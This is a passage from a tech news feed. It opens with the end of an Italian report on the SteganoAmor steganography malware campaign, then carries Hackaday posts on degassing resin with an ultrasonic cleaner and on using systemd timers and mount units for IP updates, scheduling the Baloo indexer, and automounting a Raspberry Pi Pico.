Le informazioni infine rubate vengono inviate a server FTP pre-hackerati, che gli aggressori utilizzano come infrastruttura di controllo in modo che il traffico non desti sospetti.

In totale, gli specialisti di Positive Technologies hanno identificato più di 320 attacchi rivolti ad aziende di 31 paesi, tra cui Stati Uniti, Germania e India. Tra i settori più colpiti ci sono l’industria (21%), i servizi (16%), il settore pubblico (16%), l’energia elettrica (8%) e l’edilizia (8%).

L'articolo Malware dentro le immagini. Scopriamo la Steganografia nella campagna SteganoAmor proviene da il blog della sicurezza informatica.

Cybersecurity & cyberwarfare

2024-04-16 15:30:38

Fail of the Week: Can an Ultrasonic Cleaner Remove Bubbles From Resin?

[Wendy] asked a very good question. Could putting liquid resin into an ultrasonic cleaner help degas it? Would it help remove bubbles, resulting in a cleaner pour and nicer end product? What we love is that she tried it out and shared her results. She purchased an ultrasonic cleaner and proceeded to mix two batches of clear resin, giving one an ultrasonic treatment and leaving the other untouched as a control.
Sadly, the test piece had considerably more surface bubbles than the untreated control, as well as a slight discoloration.
The results were interesting and unexpected. Initially, the resin in the ultrasonic bath showed visible bubbles rising to the surface which seemed promising. Unfortunately, this did not lead to fewer bubbles in the end product.

[Wendy]’s measurements suggest that the main result of putting resin in an ultrasonic bath was an increase in its temperature. Overheating the resin appears to have led to increased off-gassing and bubble formation prior to and during curing, which made for poor end results. The untreated resin by contrast cured with better color and much higher clarity. If you would like to skip directly to the results of the two batches, it’s right here at 9:15 in.

Does this mean it’s a total dead end? Maybe, but even if the initial results weren’t promising, it’s a pretty interesting experiment and we’re delighted to see [Wendy] walk through it. Do you think there’s any way to use the ultrasonic cleaner in a better or different way? If so, let us know in the comments.

This isn’t the first time people have tried to degas epoxy resin by thinking outside the box. We’ve covered a very cheap method that offered surprising results, as well as a way use a modified paint tank in lieu of purpose-made hardware.

Cybersecurity & cyberwarfare

2024-04-16 14:00:32

Linux Fu: Stupid Systemd Tricks

Last time, I gave a whirlwind introduction to a very small slice of systemd. If you aren’t comfortable with systemd services, timers, and mounts, you might want to read that now. Otherwise, press on to see a few interesting uses for custom systemd units, including running a few things on a schedule and automatically mounting a Raspberry Pi Zero.

Can you do every one of these things in a different way? Of course you can. I’m not debating the relative merits of using or not using systemd. However, unless you totally control your own environment, good chance you are going to have to interact with systemd at some point.

Stupid Trick #1: Update Your IP Address

A few years ago, I talked about updating your remote DNS server with your public IP address. This lets you refer to a hostname like snoopy.hackaday.com and get back to your computer that often changes IP addresses. Sure, you can get services to do that for you, but you must either pay or agree to read ads on their site to keep your hostname going. This is all under your control. In the original post, I suggested using cron or NetworkManager to run the update script. I also hinted you could do it with systemd, but I didn’t tell you how. Let’s fix that.

Step one is simple: create a “one shot service” that executes the command required:
[Unit]
Description=Update IP via SSH (called by timer)

[Service]
Type=oneshot
ExecStart=/usr/bin/ssh awce ./updateip - wd5gnr.com dyn E
WorkingDirectory=/home/alw/bin

You can read about why that works in the original post. This is an easy-to-understand unit. A one-shot service runs once and then it is done The rest is the program to run and the working directory. Piece of cake.

Next, you need a timer. The timer’s name is the same as the service except for the extension. That is, updateip.service and updateip.timer go together.

[Unit]
Description=Timer to update public IP via SSH

[Timer]
OnCalendar=*-*-* *:01,16,31,46:00
Persistent=true

[Install]
WantedBy=timers.target

Here, we ask the system to run the code every hour of every day at minutes :01, :16, :31, and :46. It is persistent, so if a timer misses, it will run as soon as possible. In theory, we should make this all dependent on the network being up, but it doesn’t hurt to try and fail since if the network is down, this doesn’t matter.

Stupid Trick #2: Shut Up Baloo!

Recent versions of KDE love Baloo, the file indexer. While it is nice to instantly find files in your home directories, and it handles a few other tasks, it also is known to eat up system resources. I’ve used cgroups and other tricks to limit Baloo’s insatiable desire for CPU and I/O time. But what works best is to shut it down in the morning and let it start again late at night.

This is not quite the same as updating the IP address. For one thing, it happens at an absolute time. It would be easy, too, to have it do different times on the weekend, for example. The other thing to note is that this timer, as it is now, should probably not be persistent. It might be smarter to make it persistent and have one script that decides what to do based on the time, but I didn’t elect to go that way.

However, I did want to stop the timer from running if there was no GUI session. This is, it turns out, tricky. You’d think you could set the timer to be “WantedBy” the GUI target, but that’s not the case. Here’s how I turn off Baloo:

[Unit]Description=Stop KDE's Baloo File Indexing Service
# Ensure this only runs in a graphical session by checking for the DISPLAY variable
ConditionEnvironment=DISPLAY

[Service]Type=oneshot
ExecStart=/usr/bin/systemctl --user stop kde-baloo

Note that the service actually calls systemd again to stop the predefined kde-baloo service. The ConditionEnvironment line means it only does this if there is a DISPLAY variable set. That’s not foolproof, but it should work for most caes.

You still need a timer:

[Unit]Description=Timer to Stop KDE's Baloo File Indexing Service Daily at 06:45

[Timer]OnCalendar=*-*-* 06:45:00
Persistent=true
Unit=baloo-off.service

[Install]WantedBy=timers.target

Of course, the baloo-on pair looks just the same, with obvious changes to the service names and time specifications.

Stupid Trick #3: Automount your Raspberry Pi Pico

Another item systemd handles is mounting filesystems. What happened to fstab? Nothing. A special program reads fstab and creates systemd mount units for you automatically. The unit files wind up somewhere like /run/systemd/generator, at least on my system.

If you use the Raspberry Pi Pico, you’ve probably noticed that when it is in boot mode, it presents a different ID to the system each time. That makes it hard to tell the system to mount it automatically. However, it should have a constant label. Making systemd automount your Pi requires two files (in /etc/systemd/system). First, there is the .mount file:

[Unit]Description=Mount Raspberry Pi Pico at startup

[Mount]What=/dev/disk/by-label/RPI-RP2
Where=/media/alw/RPI-RP2
Type=vfat
Options=defaults

[Install]WantedBy=multi-user.target

Then there is a .automount file with the same base name:

[Unit]Description=Automount Raspberry Pi Pico

[Automount]Where=/media/alw/RPI-RP2
TimeoutIdleSec=0

[Install]WantedBy=multi-user.target

Speaking of the name, systemd expects a file that mounts at path /x/y/z to be named x-y-z.mount. That’s fine until you want to mount something at path /x/y-z. That’s because the name x-y-z.mount should go to /x/y/z, not /x/y-z. To solve this, the file name needs to have an escaped hyphen in it like this: media-alw-RPI\x2dRP2.mount. That backslash needs to actually be in the file name, so you’ll have to quote or escape it in the shell, too.

Now, when you boot the Pi into bootloader mode, the system will mount it at the designated location.

That’s a Wrap!

Actually, that’s not a wrap. This shows nearly the bare minimum of what you can do with systemd. There is a question if it is desirable for one thing to do so much, but I’m trying to ignore that elephant. For today, systemd is here, and we might as well use it. If you work with others or deliver software to other users, it is a good bet you’ll have no choice.